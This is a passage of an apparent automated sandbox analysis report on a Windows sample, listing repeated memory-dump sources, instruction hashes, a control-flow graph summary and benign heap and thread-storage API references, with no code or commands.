                                                                                                      • Instruction Fuzzy Hash: F0B12077A0C502D7EA149F29A4D042DB7E3AFD0360FA48631DA28C73E5DA3DEC469B50
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 79776c15fe3340e34aa3f4cadf7d4159aa225b2ab8b2d9de6158afb2556c387d
                                                                                                      • Instruction ID: 0455d1e2c29982f1d6fe81c54918475012e471dad63343f82f9e0e1f306bf2f2
                                                                                                      • Opcode Fuzzy Hash: 79776c15fe3340e34aa3f4cadf7d4159aa225b2ab8b2d9de6158afb2556c387d
                                                                                                      • Instruction Fuzzy Hash: 12B16B66F08145CBFB289E3A58E02BD6AE2AF85784F944539DD1A877D5CE38DD018F30
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ad67457b5dc25e4ef473cfe60cb3b61a56149aa22765cf15d4c141f40b5f724f
                                                                                                      • Instruction ID: b7247565a288f62dbbbebda74a2a405c7b53dd6b2def62cd0da9ed1abe453d09
                                                                                                      • Opcode Fuzzy Hash: ad67457b5dc25e4ef473cfe60cb3b61a56149aa22765cf15d4c141f40b5f724f
                                                                                                      • Instruction Fuzzy Hash: 2DC1C532618A45C6EB749E1AA4C023EBBA1EB84794F94453AFA4DC7795CE3CD8409F70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b7c1173410c86d8b84a2824e3006717c1beaba27943f54f9205f867e7679ad0c
                                                                                                      • Instruction ID: 18eeb0c302dfb668d9943995bbfc789c86acbf92f2917f88a164d9efc41cde37
                                                                                                      • Opcode Fuzzy Hash: b7c1173410c86d8b84a2824e3006717c1beaba27943f54f9205f867e7679ad0c
                                                                                                      • Instruction Fuzzy Hash: BCC1275270C2DAC7EA3D5D26A4E02BEF6919B82344FE48435DADF93796CD4CDC468B20
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2d9a26891977e3dbdd595d316eeac1fc8415fb55c2a79e4c84eaf6860d75be96
                                                                                                      • Instruction ID: 8aa2ea98fbde291f77c48cebab61e293570c36c4cbfc80ef900d27f1d91deeba
                                                                                                      • Opcode Fuzzy Hash: 2d9a26891977e3dbdd595d316eeac1fc8415fb55c2a79e4c84eaf6860d75be96
                                                                                                      • Instruction Fuzzy Hash: 10A10E3770C141CB9720DF1AA8C051EBBE1ABC0764B649635E955C77F5CA38EC459F60
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 401fe282aea40fe0064174eb3a668b8f2b579de043f9ebea719c838a46437037
                                                                                                      • Instruction ID: 53203126f772bf9f67561b82bfc3140e0862ab1e3f0b6a754ba1f0326cb55f53
                                                                                                      • Opcode Fuzzy Hash: 401fe282aea40fe0064174eb3a668b8f2b579de043f9ebea719c838a46437037
                                                                                                      • Instruction Fuzzy Hash: E7919316B0D546C6F9349E2AA5C0039FEA06F41BD4F414239DE6B67BE2DA7CDC418FA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 170960dbb728563c5f2f192855f1a10dfda583c38b287fd4c5a91214b7848392
                                                                                                      • Instruction ID: 680bbf7059aa361b0e39b6f1a57ed5e70ee9ee055a62376863cbd95f4ba99454
                                                                                                      • Opcode Fuzzy Hash: 170960dbb728563c5f2f192855f1a10dfda583c38b287fd4c5a91214b7848392
                                                                                                      • Instruction Fuzzy Hash: 6B914EA6F0D242C7F6305E6E59C022DF292ABD5B20F948536DA55C73E5CA3CEC458F60
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b4b0d4861b0ecc72b8ab76a33449d5830e1435e7e8967c285281bd782eb323d4
                                                                                                      • Instruction ID: 7e19567698caaa7738e2179f86d8aa4dc973d316a80aabfdfbaab5fe306663bb
                                                                                                      • Opcode Fuzzy Hash: b4b0d4861b0ecc72b8ab76a33449d5830e1435e7e8967c285281bd782eb323d4
                                                                                                      • Instruction Fuzzy Hash: 8A815B36B1C602C7EA289A2AA8E567DA6D2AFC5354FA44135FD1E83BE5CD3CD8414B10
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 7979bfcc72008f24f3ccf85e84de54aeb08b3151a9f486636ece3992e033e661
                                                                                                      • Instruction ID: 69ad7ed04f6c874c376e1e60690cf75ea8e5a09734b4aa0595777238fd2bdf33
                                                                                                      • Opcode Fuzzy Hash: 7979bfcc72008f24f3ccf85e84de54aeb08b3151a9f486636ece3992e033e661
                                                                                                      • Instruction Fuzzy Hash: 4871253B708542CBD6108F2A99C006EB792BBE1725FA4C331DA55877E9CA3DE846DA50
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1674aaabbf4eec13cd1b55fcc2eebe8c060a15b67066f9e7e9269c9fda084f05
                                                                                                      • Instruction ID: 4cc620a0bffc45772081758328dbaab725bbc2ce69d12145c86eb64151974bb3
                                                                                                      • Opcode Fuzzy Hash: 1674aaabbf4eec13cd1b55fcc2eebe8c060a15b67066f9e7e9269c9fda084f05
                                                                                                      • Instruction Fuzzy Hash: 49818B36D0D103C6E6A1AE2A44C00BEB6E15F603A0FAD4532DE59873E2CA1CEC445BA3
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ef9408882d9a27c78032ad0e9cafce49ea86740dc16cbc8d92578be285f99bc4
                                                                                                      • Instruction ID: b6289177a84716bb438ca894a8f59444a28b21b9aadfd4c576ae434c4c3c37a2
                                                                                                      • Opcode Fuzzy Hash: ef9408882d9a27c78032ad0e9cafce49ea86740dc16cbc8d92578be285f99bc4
                                                                                                      • Instruction Fuzzy Hash: 1A613A2670C64ADBD630AE2EB9C053EB6A2ABC0354FE4C535E944C33A5CA7CED055F64
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 485612231-0
                                                                                                      • Opcode ID: 24d9fb72b0f8c4d9b802ed231016751df43b91170c7a894116cbb9370917ebac
                                                                                                      • Instruction ID: 50b39ad83a05a7700b90573bdad76d2019ca34cc241c27a2dbf84ddc909237c7
                                                                                                      • Opcode Fuzzy Hash: 24d9fb72b0f8c4d9b802ed231016751df43b91170c7a894116cbb9370917ebac
                                                                                                      • Instruction Fuzzy Hash: 61413622714A58C2EF14DF2BDA98569B3A2EB58FD4B889033EE0D87B58DF3CC5458310
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 67e4d3378f11ddf9338ec5b831e83c839087936af87fb9af1790402979aa6d59
                                                                                                      • Instruction ID: 44a6aeedae58b229b293c76e8bbed128879e48d2bb83503206a3da57082f487a
                                                                                                      • Opcode Fuzzy Hash: 67e4d3378f11ddf9338ec5b831e83c839087936af87fb9af1790402979aa6d59
                                                                                                      • Instruction Fuzzy Hash: 9F41E232708B45C2EB509F1AF4A076EABA0EBC5BD0F900035EE8D87BA5DE3DD4418B00
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1114 7ff7645b9040-7ff7645b908e 1115 7ff7645b90a0-7ff7645b90a5 1114->1115 1116 7ff7645b9140-7ff7645b9145 1115->1116 1117 7ff7645b90ab-7ff7645b90b0 1115->1117 1118 7ff7645b91e0-7ff7645b91e5 1116->1118 1119 7ff7645b914b-7ff7645b9150 1116->1119 1120 7ff7645b9190-7ff7645b9195 1117->1120 1121 7ff7645b90b6-7ff7645b90bb 1117->1121 1122 7ff7645b92ed-7ff7645b92f2 1118->1122 1123 7ff7645b91eb-7ff7645b91f0 1118->1123 1124 7ff7645b922f-7ff7645b9236 1119->1124 1125 7ff7645b9156-7ff7645b915b 1119->1125 1126 7ff7645b9271-7ff7645b929f 1120->1126 1127 7ff7645b919b-7ff7645b91a0 1120->1127 1128 7ff7645b90c1-7ff7645b90c6 1121->1128 1129 7ff7645b9206-7ff7645b920b 1121->1129 1122->1115 1132 7ff7645b91f6-7ff7645b91fb 1123->1132 1133 7ff7645b92f7-7ff7645b9329 GetProcessHeap HeapFree 1123->1133 1124->1115 1134 7ff7645b9161-7ff7645b9166 1125->1134 1135 7ff7645b923b-7ff7645b9261 1125->1135 1136 7ff7645b9090 1126->1136 1137 7ff7645b92a5-7ff7645b92aa 1126->1137 1138 7ff7645b92af-7ff7645b92de 1127->1138 1139 7ff7645b91a6-7ff7645b91ab 1127->1139 1130 7ff7645b9210-7ff7645b922a 1128->1130 1131 7ff7645b90cc-7ff7645b90d1 1128->1131 1129->1115 1130->1115 1131->1115 1140 7ff7645b90d3-7ff7645b9102 1131->1140 1132->1115 1141 7ff7645b9201-7ff7645b933c 1132->1141 1133->1115 1134->1115 1142 7ff7645b916c-7ff7645b9176 1134->1142 1135->1115 1143 7ff7645b9267-7ff7645b926c 1135->1143 1144 7ff7645b9092-7ff7645b909b 1136->1144 1137->1136 1145 7ff7645b92e0 1138->1145 1146 7ff7645b92e5-7ff7645b92e8 1138->1146 1139->1115 1147 7ff7645b91b1-7ff7645b91c9 1139->1147 1148 7ff7645b9104 1140->1148 1149 7ff7645b9109-7ff7645b9132 1140->1149 1142->1115 1151 7ff7645b917c-7ff7645b9181 1142->1151 1143->1115 1144->1115 1145->1146 1146->1144 1152 7ff7645b91d0-7ff7645b91da 1147->1152 1153 7ff7645b91cb 1147->1153 1148->1149 1149->1115 1151->1115 1152->1115 1153->1152
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $D<$$D<$$D<
                                                                                                      • API String ID: 0-1696938221
                                                                                                      • Opcode ID: ddb94afbb721ec7b14d65b13618e9554712962a96ccbbe3d0e67480a278cf4d4
                                                                                                      • Instruction ID: 40b8c2287b8651a46d32d12e57f5eca35b07730a873aafb86319fe30aa91bcc1
                                                                                                      • Opcode Fuzzy Hash: ddb94afbb721ec7b14d65b13618e9554712962a96ccbbe3d0e67480a278cf4d4
                                                                                                      • Instruction Fuzzy Hash: AD712A36B0DA49CBE6205E2AA4E063DF7A2AFD2350FA44131E95D833D5CE3DD842C711
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF764605ECD
                                                                                                      • TlsSetValue.KERNEL32(?,?,00001AFB4450AA70,00007FF7646065B6,?,?,00001AFB4450AA70,00007FF764607DA5,?,?,?,?,00007FF76460C60E,?,?,00000000), ref: 00007FF764605EE4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Valuetry_get_function
                                                                                                      • String ID: FlsSetValue
                                                                                                      • API String ID: 738293619-3750699315
                                                                                                      • Opcode ID: b7ca1fa586fd1b4387c018720e26ca70aafa06f553ecdae497349a26f2a14758
                                                                                                      • Instruction ID: 9cd634d1dae694f655646aab57091c91cf20f335a8bee5bfa34b7e75a64f0b06
                                                                                                      • Opcode Fuzzy Hash: b7ca1fa586fd1b4387c018720e26ca70aafa06f553ecdae497349a26f2a14758
                                                                                                      • Instruction Fuzzy Hash: B9E06561E18646D1FA05AF57E5881B5E233EF48B80FC84036D55E07794CE3CE8948320
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%